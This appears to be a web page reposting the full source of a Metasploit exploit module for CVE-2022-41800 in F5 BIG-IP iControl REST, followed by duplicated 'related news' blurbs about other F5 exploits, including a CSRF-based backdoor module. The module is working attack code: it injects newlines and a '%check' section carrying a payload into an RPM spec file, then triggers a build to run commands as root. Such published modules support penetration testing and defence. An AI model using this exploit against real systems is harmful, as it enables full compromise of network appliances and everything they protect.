Headline
F5 BIG-IP iControl Remote Command Execution
This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator', 'Description' => %q{ This module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Ron Bowes' # Discovery, PoC, and module ], 'References' => [ ['CVE', '2022-41800'], ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], ['URL', 'https://support.f5.com/csp/article/K97843387'], ['URL', 'https://support.f5.com/csp/article/K13325942'], ], 'License' => MSF_LICENSE, 'DisclosureDate' => '2022-11-16', # Vendor advisory 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Privileged' => true, 'Targets' => [ [ 'Default', {} ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts. 'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts. }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], # One at a time 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ] } ) ) register_options( [ OptString.new('HttpUsername', [true, 'iControl username', 'admin']), OptString.new('HttpPassword', [true, 'iControl password', '']) ] ) end def exploit # The RPM name is based on these, so we need these to delete the RPM file after name = rand_text_alphanumeric(5..10) version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}" release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}" vprint_status('Creating an .rpmspec file on the target...') result = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'), 'ctype' => 'application/json', 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), 'data' => { 'specFileData' => { 'name' => name, 'srcBasePath' => '/tmp', 'version' => version, 'release' => release, # This is the injection - add newlines then a '%check' section 'description' => "\n\n%check\n#{payload.encoded}\n", 'summary' => rand_text_alphanumeric(5..10) } }.to_json }) fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401 fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200 json = result&.get_json_document fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json file_path = json['specFilePath'] fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path vprint_status("Created spec file: #{file_path}") register_file_for_cleanup(file_path) # We can also use `exit 1` in the %check function to prevent this file # from being created, rather than cleaning it up.. but that seems noisier? # Neither option gets logged so /shrug register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm") vprint_status('Building the RPM to trigger the payload...') result = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'), 'ctype' => 'application/json', 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), 'data' => { 'state' => {}, 'appName' => rand_text_alphanumeric(5..10), 'packageDirectory' => '/tmp', 'specFilePath' => file_path }.to_json }) fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401 fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299 endendRelated news
This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.
In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.
This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.
Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -
Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -
Widespread exploitation deemed ‘unlikely’ given hurdles
Widespread exploitation deemed ‘unlikely’ given hurdles